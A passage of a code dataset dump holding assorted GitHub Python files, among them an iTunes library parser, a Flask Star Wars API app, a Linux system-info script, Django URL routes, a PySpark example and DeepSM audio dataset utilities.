                           \"File Folder Count\", \"Library Folder Count\", \"Name\", \n                              \"Artist\", \"Kind\", \"Location\"]\n        \n        class Track:\n            def __init__(self, track_id, size, total_time, date_modified, \n                         date_added, bitrate, sample_rate, play_count, play_date, \n                         play_date_utc, skip_count, skip_date, rating,\n                         album_rating, persistent_id, track_type, \n                         file_folder_count, library_folder_count, name, artist, \n                         kind, location):\n                \n                self.track_id = track_id\n                self.size = size\n                self.total_time = total_time\n                self.date_modified = date_modified\n                self.date_added = date_added\n                self.bitrate = bitrate\n                self.sample_rate = sample_rate\n                self.play_count = play_count\n                self.play_date = play_date\n                self.play_date_utc = play_date_utc\n                self.skip_count = skip_count\n                self.skip_date = skip_date\n                self.rating = rating\n                self.album_rating = album_rating\n                self.persistent_id = 
persistent_id\n self.track_type = track_type\n self.file_folder_count = file_folder_count\n self.library_folder_count = library_folder_count\n self.name = name\n self.artist = artist\n self.kind = kind\n self.location = location\n \n \n # Create tracks list with attributes\n main_dict = self.lib.findall('dict') \n \n sub_array=main_dict[0].findall('dict')\n sub_array_childrens = list(sub_array[0])\n \n for track in sub_array_childrens:\n att_list = [None] * 22\n \n if track.tag == \"dict\":\n track_attributes = list(track)\n for att_ind in range(0, len(track_attributes), 2):\n try:\n tag_index = attribut_name_list.index(\n track_attributes[att_ind].text)\n except ValueError:\n pass\n else:\n att_list[tag_index] = track_attributes[att_ind+1].text\n\n self.track_attr_list.append(Track(att_list[0], att_list[1], \n att_list[2], att_list[3],\n att_list[4], att_list[5], \n att_list[6], att_list[7],\n att_list[8], att_list[9], \n att_list[10], att_list[11],\n att_list[12], att_list[13], \n att_list[14], att_list[15], \n att_list[16], att_list[17], \n att_list[18], att_list[19], \n att_list[20], att_list[21]))\n \n \n def get_playlist_contents(self, playlist_name):\n \"\"\"Returns tracks (with attributes) of given playlist\"\"\"\n playlist_with_attributes = []\n \n for track in self.complete_playlist:\n if track[0] == playlist_name:\n temp_track_ID = track[1]\n \n for elem in self.track_attr_list: \n if elem.track_id == temp_track_ID:\n playlist_with_attributes.append(elem)\n break\n return playlist_with_attributes\n \n \ndef get_size(input_size):\n \"\"\"Returns the size of a track in a human-readable way\"\"\"\n return float(\"{0:.2f}\".format(int(input_size)/1E6))\n \n \ndef get_total_time(input_time):\n \"\"\"Returns the duration of a track in a human-readable way\"\"\"\n return int(int(input_time)/1000)\n\n\ndef get_rating(input_rating):\n \"\"\" Returns stars iTunes rating\"\"\"\n if input_rating:\n return (int(input_rating)/100)*5\n else:\n return input_rating\n \n\ndef get_track_path(input_url):\n \"\"\"Returns the path of a track\"\"\"\n return unquote(urlparse(input_url).path[1:])\n","repo_name":"mickael2054/IReadiTunes","sub_path":"IReadiTunes/IReadiTunes.py","file_name":"IReadiTunes.py","file_ext":"py","file_size_in_byte":6722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21003596604","text":"\r\ndef searchName():\r\n user_input = input(\">>\").title()\r\n \r\n my_file = open(\"names.txt\" , \"r\")\r\n \r\n for s in my_file:\r\n if s.startswith(user_input):\r\n print(s)\r\n\r\ndef searchAge():\r\n inline = open(\"names.txt\", \"r\")\r\n user_input=str(input(\"Enter a number: \"))\r\n \r\n for s in inline:\r\n if user_input in s:\r\n print(s)\r\n\r\n \r\nif __name__=='__main__':\r\n \r\n pick = int(input(\"enter 1 to search for name or enter 2 to search for age: \"))\r\n \r\n if pick == 1 :\r\n searchName()\r\n elif pick == 2:\r\n searchAge()\r\n else:\r\n print(\"Invalid Choice \")\r\n","repo_name":"vicYegon/my-SEPA22-preliminary-projs","sub_path":"Adding the main function.py","file_name":"Adding the main function.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40140856568","text":"\"\"\"Tests for the CLI.\"\"\"\n\nfrom click.testing import CliRunner\nfrom plab2.cli import compile\nfrom pathlib import Path\n\nTHIS_DIR = Path(__file__).parent\nTHIS_PATH = THIS_DIR.joinpath(\"data\")\nPPI_FILE = 
THIS_PATH.joinpath('ppis.csv')\nNODES_FILE = THIS_PATH.joinpath('nodes.tsv')\nEDGES_FILE = THIS_PATH.joinpath('edges.tsv')\n\n\nclass TestCli:\n    def test_compile(self):\n        \"\"\"Tests for subcommand compile\"\"\"\n        runner = CliRunner()\n        result = runner.invoke(compile, [str(PPI_FILE), str(NODES_FILE), str(EDGES_FILE), \"--enrich\"])\n        assert result.exit_code == 0\n        assert NODES_FILE.is_file()\n        assert EDGES_FILE.is_file()\n        NODES_FILE.unlink()\n        EDGES_FILE.unlink()\n        assert not NODES_FILE.is_file()\n        assert not EDGES_FILE.is_file()\n\n        help_result = runner.invoke(compile, [\"--help\"])\n        assert \"Enrich the graph with RNA and DNA molecules.\" in help_result.output\n\n\n\n\n\n\n\n","repo_name":"danqi123/gene_protein_network_package","sub_path":"plab2_package/tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72021210406","text":"#!/usr/bin/python3\n\"\"\"Defines a matrix multiplication function using NumPy.\"\"\"\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n    \"\"\"\n    Multiplies two matrices m_a and m_b using NumPy.\n\n    Args:\n        m_a (list): The first matrix.\n        m_b (list): The second matrix.\n\n    Returns:\n        np.ndarray: The resulting matrix of the multiplication.\n    \"\"\"\n    # Convert input lists to NumPy arrays\n    np_a = np.array(m_a)\n    np_b = np.array(m_b)\n\n    # Check if the matrices can be multiplied\n    if np_a.shape[1] != np_b.shape[0]:\n        raise ValueError(\"m_a and m_b can't be multiplied\")\n\n    # Perform matrix multiplication using NumPy\n    result = np.dot(np_a, np_b)\n\n    return result\n","repo_name":"Gideon5348/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74414045605","text":"import basicoperations\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\nif __name__ == \"__main__\":\n    #python write.py ..\\Rural_Atlas_Update20\\Income.csv\n    spark = (SparkSession\n            .builder\n            .appName('write')\n            .getOrCreate())\n\n    income_df = spark.read.csv(basicoperations.INCOME_FILE, \n                    schema = basicoperations.SCHEMA,\n                    header = True)\n\n    richest_states = (income_df\n                    .select('State','County','PerCapitaInc')\n                    .sort(col('PerCapitaInc'), ascending = False)\n                    )\n\n    #write to parquet file (schema stored with data)\n    richest_states.show(5)\n\n    op_path = './out/richest_states.parquet'\n    \n    print(f'Writing richest state data to {op_path}')\n\n    richest_states.write \\\n        .format('parquet') \\\n        .save(op_path)\n\n    #read from written file again\n    print(f'Reading richest state data from {op_path}')\n    richest_parquet_df = spark.read.parquet(op_path)\n    print(richest_parquet_df.schema)\n    richest_parquet_df.show(20)","repo_name":"krishansubudhi/sparkparactice","sub_path":"write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32102784092","text":"with open('st_15_12_22.txt') as f:\n    maxx=0\n    count=0\n    f = f.readline().split('F')\n    for x in f:\n        if x.count('A')<=2:\n            \n            maxx=max(maxx,len(x))\nprint(maxx)\n    
\n","repo_name":"olgaObnosova/EGE_2","sub_path":"№24/st_15_12_22.py","file_name":"st_15_12_22.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23255600050","text":"from flask import Flask, render_template, request, jsonify, abort\nfrom flask_lazyviews import LazyViews\nimport requests\n\n\napp = Flask(__name__)\nviews = LazyViews(app)\n\n@app.route('/')\ndef inicio():\n return render_template('index.html', title=\"Star Wars\")\n\n\n@app.route('/peliculas')\ndef peliculas():\n response = requests.get('https://swapi.dev/api/films')\n lista_peliculas = response.json()['results']\n\n return render_template('peliculas.html', title=\"Peliculas Star Wars\", peliculas=lista_peliculas)\n\n\n@app.route('/personajes')\ndef personajes():\n\n return render_template('personajes.html')\n\n\n@app.route('/traer_personaje')\ndef traer_personajes_pelicula():\n id_personaje = request.args.get('id_personaje')\n\n response_personajes = requests.get(f'https://swapi.dev/api/people/{id_personaje}')\n\n if not response_personajes.ok:\n abort(404, description=\"Personaje no existe, intente con un ID del 1 al 83\")\n\n info_personaje = response_personajes.json()\n\n info_basica_personaje = {'id': id_personaje,\n 'nombre': info_personaje['name'],\n 'altura': info_personaje['height'],\n 'color_cabello': info_personaje['hair_color'],\n 'anio_nacimiento': info_personaje['birth_year']}\n\n\n return jsonify(result=info_basica_personaje)\n\n\n@app.errorhandler(404)\ndef resource_not_found(e):\n return jsonify(error=str(e)), 404\n\n\napp.run(host='0.0.0.0')","repo_name":"javihng/prueba_javier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"98016904","text":"from collections import deque\n\ndef dfs(graph: dict, source: str, target: str) -> bool:\n if source == target: return True\n \n explored = [source]\n s = deque()\n s.append(source)\n\n while s:\n start = s.pop()\n for v in graph[start]:\n if v == target:\n return True\n if v not in explored:\n s.append(v)\n explored.append(v)\n\n return False\n\n\nadj_list = {'s': ['a', 'b'], 'a': ['s', 'c'], 'b': ['s', 'c', 'd'], 'c': ['a', 'b', 'd', 'e'], 'd': ['b', 'c', 'e'], 'e': ['c', 'd']}\nprint(dfs(adj_list, 's', 'e'))\nprint(dfs(adj_list, 's', 'f'))","repo_name":"unit0113/projects","sub_path":"Algorithms/Algorithms_Illuminated/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9886243650","text":"# Auth: Stephen Foster CS-446, Feb '22\n\n# stephenfoster_examine_system.py\n\n# Prints the following:\n\n# CPU type and model.\n# Kernel version details. \n# Amount of time since last boot.\n# The time that the system was last booted (same format)- Note: this is not the same as 3, try exploring the systemd process.\n# The number of disk requests made. \n# The number of processes created since last boot.\n\n# To: _systemDetails.txt\n\nimport os\nimport datetime\nfrom sys import platform\n\ndef main():\n\n if platform != \"linux\":\n print(\"Oops! 
You're running this script from \" + platform.capitalize() + \"!\")\n exit()\n \n netid = \"stephenfoster\"\n self = netid + \"_examine_system.py\"\n out_file = netid + \"_systemDetails.txt\"\n out_path = os.path.split(os.path.join(os.getcwd(), self))[0]\n\n #Take and parse input from /proc\n cpuinfo = parseForStart(getRaw(\"/proc/cpuinfo\"), [\"model name\", \"cpu cores\"])\n version = fixListToStr(getRaw(\"/proc/version\"))\n uptime = float(parsePos(fixListToStr(getRaw(\"/proc/uptime\")), 0, \" \"))\n systemd = int(parsePos(fixListToStr(getRaw(\"/proc/1/stat\")), 21, \" \"))\n boottime = int(parsePos(fixListToStr(parseForStart(getRaw(\"/proc/stat\"), [\"btime\"])), 1, \" \"))\n diskstats = parsePos(fixListToStr(parseForRelSub(getRaw(\"/proc/diskstats\"), [\"sda1\"], -1)), 1, \"sda\")\n vmstats = parseForStart(getRaw(\"/proc/vmstat\"), [\"pgpgin\", \"pgpgout\", \"pswpin\", \"pswpout\"])\n processes = parsePos(fixListToStr(parseForStart(getRaw(\"/proc/stat\"), [\"processes\"])), 1, \" \")\n\n #Format uptime from /proc/uptime\n uptime = str(datetime.timedelta(seconds=int(uptime)))\n\n #Calculate boot date/time from /proc/1/stat starttime(22) [boot time since epoch + time elapsed until systemd = start date]\n HZ = os.sysconf(os.sysconf_names['SC_CLK_TCK'])\n boottime += systemd/HZ\n boottime = str(datetime.datetime.fromtimestamp(int(boottime)))\n \n #Further parse and fill diskstats\n reads = \"Reads: \" + parsePos(diskstats, 1, \" \")\n writes = \"Writes: \" + parsePos(diskstats, 5, \" \") + \"\\n\"\n diskstats = [reads, writes]\n \n #Output polishing\n cpuinfo.insert(0, \"(1) CPU Type and Model:\\n\")\n for x in range(1, len(cpuinfo)):\n cpuinfo[x] = \"\\t\" + cpuinfo[x]\n version = (\"(2) Kernel Version:\\n\\t\") + version\n uptime = \"(3) Uptime: \" + str(uptime)\n boottime = \"(4) System Boot: \" + boottime\n diskstats = [\"(5) Disk Requests:\\n\"] + diskstats\n for x in range(1, len(diskstats)):\n diskstats[x] = \"\\t\" + diskstats[x]\n processes = \"(6) Processes: \" + fixListToStr(processes)\n\n #Fill an output buffer and write it to the out file\n buffer = [cpuinfo, version, uptime, boottime, diskstats, processes]\n clearFile(out_path, out_file)\n\n for item in buffer:\n if type(item) == list:\n for s in item:\n outputToFile(out_path, out_file, str(s))\n elif type(item) == str:\n outputToFile(out_path, out_file, item + \"\\n\")\n else:\n outputToFile(out_path, out_file, str(item))\n\ndef getRaw(_path):\n fin = open(_path, \"r\")\n raw = fin.readlines()\n fin.close()\n return raw\n\ndef parseForRelSub(_lines, _strs, _pos):\n hits = []\n numLines = 0\n for line in _lines:\n for _str in _strs:\n if _str in line:\n hits = hits[:] + [_lines[numLines + _pos]]\n if len(hits) == len(_strs):\n return hits\n numLines += 1\n return hits\n\ndef parseForSub(_lines, _strs):\n hits = []\n for line in _lines:\n for _str in _strs:\n if line.find(_str):\n hits = hits[:] + [line]\n if len(hits) == len(_strs):\n return hits\n return hits\n\ndef parseForStart(_lines, _strs):\n hits = []\n for line in _lines:\n for _str in _strs:\n if line.startswith(_str):\n hits = hits[:] + [line]\n if len(hits) == len(_strs):\n return hits\n return hits\n \ndef parsePos(_line, _pos, _delin):\n positions = _line.split(_delin)\n return positions[_pos]\n\ndef fixListToStr(_list):\n return str(_list).replace('[','').replace(']','').replace('\\'', '').replace('\\\\n', '')\n\ndef outputToFile(_path, _out_file, _str):\n fout = open(_path + \"/\" + _out_file, \"a\")\n fout.write(_str)\n fout.close()\n\ndef clearFile(_path, 
_out_file):\n fout = open(_path + \"/\" + _out_file, \"w\")\n fout.write('')\n fout.close()\n\nif __name__ == '__main__':\n main()","repo_name":"Stehfyn/cs446","sub_path":"Assignment-1/stephenfoster_examine_system.py","file_name":"stephenfoster_examine_system.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35332494925","text":"from django.urls import path\n\nfrom .views.author import (AuthorCreate, AuthorDelete, AuthorDetail,\n AuthorList, AuthorUpdate, StaffAuthor,\n StaffAuthorDetail)\n# staff\nfrom .views.book import (BookCreate, BookDelete, BookDetail, BookList,\n BookUpdate)\nfrom .views.category import (CategoryCreate, CategoryDelete, CategoryDetail,\n CategoryList, CategoryUpdate, StaffCategory,\n StaffCategoryDetail)\nfrom .views.home import HomeView\nfrom .views.search import SearchResultsView\n\n# home\nurlpatterns = [\n path('', HomeView.as_view(), name='home')\n]\n\n# search\nurlpatterns += [\n path('search/', SearchResultsView.as_view(), name='search_result')\n]\n\n# book\nurlpatterns += [\n path('book/', BookList.as_view(), name='book_list'),\n path('book/', BookDetail.as_view(), name='book_detail'),\n]\n\n# author\nurlpatterns += [\n path('author/', AuthorList.as_view(), name='author_list'),\n path('author/', AuthorDetail.as_view(), name='author_detail'),\n]\n\n# category\nurlpatterns += [\n path('category/', CategoryList.as_view(), name='category_list'),\n path('category/', CategoryDetail.as_view(), name='category_detail'),\n]\n\n# staff\nurlpatterns += [\n # book\n path('staff/book/create/', BookCreate.as_view(), name='book_create'),\n path('staff/book/edit/', BookUpdate.as_view(), name='book_edit'),\n path('staff/book/delete/', BookDelete.as_view(), name='book_delete'),\n\n # category\n path('staff/category/', StaffCategory.as_view(), name='staff_category'),\n path('staff/category/', StaffCategoryDetail.as_view(), name='staff_category_detail'),\n path('staff/category/create/', CategoryCreate.as_view(), name='category_create'),\n path('staff/category/edit/', CategoryUpdate.as_view(), name='category_edit'),\n path('staff/category/delete/', CategoryDelete.as_view(), name='category_delete'),\n\n # author\n path('staff/author/', StaffAuthor.as_view(), name='staff_author'),\n path('staff/author/', StaffAuthorDetail.as_view(), name='staff_author_detail'),\n path('staff/author/create/', AuthorCreate.as_view(), name='author_create'),\n path('staff/author/edit/', AuthorUpdate.as_view(), name='author_edit'),\n path('staff/author/delete/', AuthorDelete.as_view(), name='author_delete'),\n]\n","repo_name":"MaryamHoushyari/Book-Store","sub_path":"BookStoreSrc/product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34855832303","text":"\nimport os\nimport shutil\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, ConcatDataset, Sampler\n\nfrom deepSM import SMData\nfrom deepSM import utils\nimport deepSM.beat_time_converter as BTC\nfrom deepSM import wavutils\nfrom deepSM import StepPlacement\nfrom deepSM import SMDataset\nfrom deepSM import SMGenDataset\n\nimport h5py\n\nfrom importlib import reload\nreload(BTC)\nreload(wavutils)\nreload(utils)\nreload(SMData)\nreload(SMDataset)\n\n\ndef get_dataset_from_file(\n dataset_name,\n dataset_type,\n song_names=None,\n n_songs=None,\n base_path=utils.BASE_PATH,\n 
concat=True,\n step_pos_labels=False,\n **kwargs):\n\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n dataset_type = dataset_type.lower()\n\n if song_names is None:\n song_names = os.listdir(ds_path)\n\n if n_songs is not None:\n song_names = song_names[:n_songs]\n\n smds = []\n\n # Can include context size here!\n for song_name in song_names:\n if dataset_type in 'generat':\n smds.append(SMGenDataset.load(\n song_name, dataset_name=dataset_name,\n **kwargs))\n elif dataset_type in 'placement':\n smds.append(SMDataset.load(\n song_name, dataset_name=dataset_name,\n **kwargs))\n else:\n raise ValueError(\"Dataset type must be gen or placement.\")\n\n if concat:\n res = ConcatDataset(smds)\n else:\n res = smds\n\n if step_pos_labels:\n labels = []\n for smd in smds:\n labels.append(smd.step_pos_labels[:, 7:-7].reshape(-1))\n\n labels = np.concatenate(labels)\n\n return res, labels\n\n else:\n return res\n\ndef get_dataset_from_raw(\n raw_data_name,\n base_path=utils.BASE_PATH,\n chunk_size=100):\n\n song_names = os.listdir(f\"{base_path}/data/{raw_data_name}\")\n\n smds = []\n for song_name in song_names:\n smds.append(generate(\n song_name, raw_data_name, base_path, chunk_size=chunk_size))\n\n return ConcatDataset(smds)\n\n\ndef train_test_split_dataset(\n dataset_name,\n test_split=0.25,\n base_path=utils.BASE_PATH):\n\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n\n song_names = os.listdir(ds_path)\n np.random.shuffle(song_names)\n\n n_train = int(np.round(len(song_names) * (1 - test_split)))\n train_songs = song_names[:n_train]\n test_songs = song_names[n_train:]\n\n train_path = f\"{ds_path}_train\"\n test_path = f\"{ds_path}_test\"\n if not os.path.isdir(train_path):\n os.mkdir(train_path)\n if not os.path.isdir(test_path):\n os.mkdir(test_path)\n\n for song in train_songs:\n shutil.copytree(f\"{ds_path}/{song}\", f\"{train_path}/{song}\")\n\n for song in test_songs:\n shutil.copytree(f\"{ds_path}/{song}\", f\"{test_path}/{song}\")\n\n\n\ndef save_generated_datasets(\n raw_data_name,\n dataset_name=None,\n song_names=None,\n base_path=utils.BASE_PATH,\n test_split=0.25,\n overwrite=False,\n **kwargs):\n \"\"\"\n Generates datasets from raw data, and saves them into a dataset.\n Optionally with train-test splits.\n \"\"\"\n\n if dataset_name is None:\n dataset_name = f\"{raw_data_name}_placement\"\n\n raw_data_path = f\"{base_path}/data/{raw_data_name}\"\n ds_path = f\"{base_path}/datasets/{dataset_name}\"\n\n if song_names is None:\n song_names = os.listdir(raw_data_path)\n\n if test_split is not None:\n song_names = song_names.copy()\n np.random.shuffle(song_names)\n\n n_train = int(np.round(len(song_names) * (1-test_split)))\n\n train_set = song_names[:n_train]\n test_set = song_names[n_train:]\n\n save_generated_datasets(\n raw_data_name,\n dataset_name + '_train',\n train_set,\n base_path,\n None, overwrite, **kwargs)\n\n save_generated_datasets(\n raw_data_name,\n dataset_name + '_test',\n test_set,\n base_path,\n None, overwrite, **kwargs)\n\n return dataset_name\n\n if os.path.isdir(ds_path):\n if not overwrite:\n raise ValueError(\"Dataset %s already exists.\" % dataset_name)\n else:\n os.mkdir(ds_path)\n\n for song_name in song_names:\n smd = generate(song_name, raw_data_name, base_path, **kwargs)\n smd.save(dataset_name=dataset_name)\n\n return dataset_name\n\n\ndef augment_dataset(\n dataset_name, model_name, base_path=utils.BASE_PATH, **kwargs):\n \"\"\"\n Adds step predictions to the dataset.\n\n Currently unused, as we train step generation models based on 
true step\n placement labels.\n \"\"\"\n\n new_dataset_name = f\"{dataset_name}_placement\"\n model_path = f\"{base_path}/models/{model_name}\"\n print(\"New dataset name:\")\n print(new_dataset_name)\n\n placement_model = StepPlacement.RegularizedRecurrentStepPlacementModel()\n placement_model.load_state_dict(torch.load(model_path))\n placement_model.cuda()\n\n smds = get_dataset_from_file(\n dataset_name, chunk_size = -1, concat=False, **kwargs)\n\n for smd in smds:\n\n step_preds = []\n\n for i in range(len(smd.diffs)):\n d = smd[i]\n\n # Adding empty batch dimension.\n def preprocess_data(val):\n if isinstance(val, np.ndarray):\n val = torch.from_numpy(val)\n return torch.unsqueeze(val, 0)\n\n d = dict(map(\n lambda x: (x[0], preprocess_data(x[1])),\n d.items()))\n\n\n step_pos_labels = d['step_pos_labels'].cuda()\n step_type_labels = d['step_type_labels'].cuda().long()\n fft_features = d['fft_features'].cuda()\n diff = d['diff'].cuda().float()\n\n\n with torch.no_grad():\n step_predictions = placement_model(fft_features, diff)\n\n\n step_predictions = np.r_[\n np.ones(smd.context_size) * -25,\n step_predictions.cpu().numpy().reshape(-1),\n np.ones(smd.context_size) * -25\n ].reshape((1, -1))\n\n step_preds.append(step_predictions)\n\n smd.step_predictions = np.concatenate(step_preds)\n\n smd.save(dataset_name=new_dataset_name)\n\n\ndef generate(\n song_name,\n raw_data_name,\n base_path=utils.BASE_PATH,\n chunk_size=100,\n context_size=7,\n drop_diffs=[],\n log=False):\n \"\"\"\n Generate an SMDataset from SM/wav files.\n Only creates datasets with no step predictions.\n \"\"\"\n\n sm = SMData.SMFile(song_name, raw_data_name, base_path)\n\n # May want to save the time mapping later.\n btc = BTC.BeatTimeConverter(sm.offset, sm.bpms, sm.stops)\n\n # Will want to mantain order.\n # List of strings, not ints.\n diffs = list(filter(lambda x: x != 'Edit', sm.note_charts.keys()))\n if drop_diffs is not None:\n diffs = list(filter(lambda x: x not in drop_diffs, diffs))\n\n notes = {} # Contains only a list of notes for each difficulty.\n times = {} # List of times per diff.\n frames = {}\n # labels = {} # List of note aligned labels for note events. 
{0, 1} for now.\n\n\n    # Track first and last notes for wav padding.\n    first_frame = np.inf\n    last_frame = -np.inf\n\n    # Find note times and frames for alignment to features.\n    for diff in diffs:\n        times[diff], notes[diff] = \\\n            btc.gen_time_notes(sm.note_charts[diff].notes)\n\n        frames[diff] = btc.align_to_frame(times[diff])\n\n        if frames[diff][0] < first_frame:\n            first_frame = frames[diff][0]\n        if frames[diff][-1] > last_frame:\n            last_frame = frames[diff][-1]\n\n    # Test this!\n    # Test by writing beeps again.\n    front_pad_frames, padded_wav = \\\n        wavutils.pad_wav(first_frame, last_frame, sm.wavdata)\n\n    fft_features = wavutils.gen_fft_features(padded_wav, log=log)\n\n    # N_channels = 3 (1024, 2048, 4096)\n    # N_frames ~ song length * 44100 / 512\n    # N_freqs = 80 (Number of mel coefs per frame)\n    N_channels, N_frames, N_freqs = fft_features.shape\n\n    step_pos_labels = np.zeros((len(diffs), N_frames))\n    step_type_labels = np.zeros((len(diffs), N_frames, 4))\n    for i, diff in enumerate(diffs):\n        # Adjusting for the new frames added on to the front.\n        frames[diff] += front_pad_frames\n\n        # Generating final frame-aligned labels for note event:\n        step_pos_labels[i, frames[diff]] = 1\n\n\n        for j, note in zip(frames[diff], notes[diff]):\n            step_type_labels[i, j, :] = np.array(list(map(int, note)))\n\n\n    return SMDataset.SMDataset(\n        song_name, diffs, fft_features, step_pos_labels, step_type_labels,\n        chunk_size, context_size)\n","repo_name":"Vivoe/DeepSM","sub_path":"deepSM/SMDUtils.py","file_name":"SMDUtils.py","file_ext":"py","file_size_in_byte":8848,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"14903596589","text":"import numpy as np \nimport pandas as pd \n\nLOG_DIR = 'logs/'\nenv_list = ['AtlantisNoFrameskip', 'BattleZoneNoFrameskip', 'BreakoutNoFrameskip', 'PongNoFrameskip', 'QbertNoFrameskip', 'SkiingNoFrameskip', \n            'VentureNoFrameskip', 'ZaxxonNoFrameskip']\nsetting = 'LR1e-2|HT=0.0|Pop=128|STD=0.02|Linear|LR=0.01|'\nsetting = 'LR1e-2|HT=0.0|Pop=128|STD=0.02|MLP|'\n\nfor env in env_list:\n    file_name = LOG_DIR + setting + '_' + env + '-v4_seed0.csv'\n    data = pd.read_csv(file_name)[-10:]\n    print(env, data['mean_reward'].mean())","repo_name":"cangcn/NES-HT","sub_path":"print.py","file_name":"print.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17248765404","text":"import thClient as thnw\nimport usbDev as thlocal\nimport socket\nimport json\nimport sys\n\nfrom uiGlobals import *\n\ndef SetDeviceControl(top):\n    \"\"\"\n    set a device control through serial or network\n    Args:\n        top:The self parameter is a reference to the current \n        instance of the class,and is used to access variables\n        that belong to the class.\n    Return:\n        None\n    \"\"\" \n    if top.myrole['uc'] == True:\n        if top.myrole['thc'] == True:\n            top.thCtrl = \"local\"\n        else:\n            top.thCtrl = \"network\"\n\n\ndef ResetDeviceControl(top):\n    \"\"\"\n    Reset the device\n    Args:\n        top:The self parameter is a reference to the current \n        instance of the class,and is used to access variables\n        that belong to the class.\n    Return:\n        None \n    \"\"\"\n    if top.hcclient != None:\n        top.clienthc.close()\n        top.hcclient.close()\n\ndef get_tree_change(top):\n    \"\"\"\n    get the device tree change info through network\n    Args:\n        top:The self parameter is a reference to the current \n        instance of the class,and is used to access variables\n        that belong to the class.\n    Return:\n        None\n\n    \"\"\" 
if top.thCtrl == \"local\":\n if sys.platform.startswith(\"win\"):\n updtu4list = thlocal.get_usbandusb4_tree()\n if len(top.masterList) == 0:\n for dev in updtu4list:\n top.masterList.append(dev)\n thlocal.get_u4_tree_change(top, updtu4list)\n top.save_usb_list(updtu4list)\n\n else:\n dl, newlist = thlocal.get_usb_tree()\n thlocal.get_tree_change(top, dl, newlist)\n \n if sys.platform == \"darwin\":\n newdict = thlocal.get_tb_tree()\n thlocal.get_tb_tree_change(top, newdict)\n\n elif top.thCtrl == \"network\":\n resdict = thnw.get_usb_tree(top.ldata['thcid'],\n int(top.ldata['sthcpn']))\n if resdict[\"result\"][0][\"status\"] == \"OK\":\n findict = resdict[\"result\"][1][\"data\"]\n if findict[0] == -1:\n top.device_no_response()\n return\n thlocal.get_tree_change(top, findict[0], findict[1]) \n else:\n top.print_on_log(\"TH Computer Connection Fail!\\n\")\n top.device_no_response() ","repo_name":"mcci-usb/Cricket","sub_path":"src/thControl.py","file_name":"thControl.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"11694999473","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module reads the image array in, uses MTCNN to crop the image, resize the cropped image back to 48x48 and saves it\nas .npy file for numpy loading if necessary.\n\"\"\"\nimport csv\nimport numpy as np\nfrom data_processing import crop_face_single\nfrom utils import emotion_int_to_str\n\nDATA_DIR = \"../data/icml_face_data.csv\"\n\nTRAIN_LABEL = \"Training\"\nPUB_TEST_LABEL = \"PublicTest\"\nPRI_TEST_LABEL = \"PrivateTest\"\n\nx_train = []\nx_test = []\nx_valid = []\ny_train = []\ny_test = []\ny_valid = []\n\n\nwith open(DATA_DIR, \"r\") as f:\n reader = csv.reader(f, delimiter=\",\")\n reader.__next__()\n for line in reader:\n emotion_int = int(line[0])\n emotion_str = emotion_int_to_str(emotion_int)\n purpose = line[1]\n pixel_array = line[2].split(' ')\n pixel_array = np.array(list(map(int, pixel_array)), dtype=np.uint8)\n pixel_array = np.reshape(pixel_array, (-1, 48))\n\n pixel_array_cropped = crop_face_single(pixel_array, resize=True)\n\n if purpose == TRAIN_LABEL:\n x_train.append(pixel_array_cropped)\n y_train.append(emotion_int)\n elif purpose == PUB_TEST_LABEL:\n x_test.append(pixel_array_cropped)\n y_test.append(emotion_int)\n elif purpose == PRI_TEST_LABEL:\n x_valid.append(pixel_array_cropped)\n y_valid.append(emotion_int)\n\nx_train = np.asarray(x_train)\nx_test = np.asarray(x_test)\nx_valid = np.asarray(x_valid)\ny_train = np.asarray(y_train)\ny_test = np.asarray(y_test)\ny_valid = np.asarray(y_valid)\n\nnp.save('../data/processed_data/cropped/x_train.npy', x_train)\nnp.save('../data/processed_data/cropped/x_test.npy', x_test)\nnp.save('../data/processed_data/cropped/x_valid.npy', x_valid)\nnp.save('../data/processed_data/cropped/y_train.npy', y_train)\nnp.save('../data/processed_data/cropped/y_test.npy', y_test)\nnp.save('../data/processed_data/cropped/y_valid.npy', 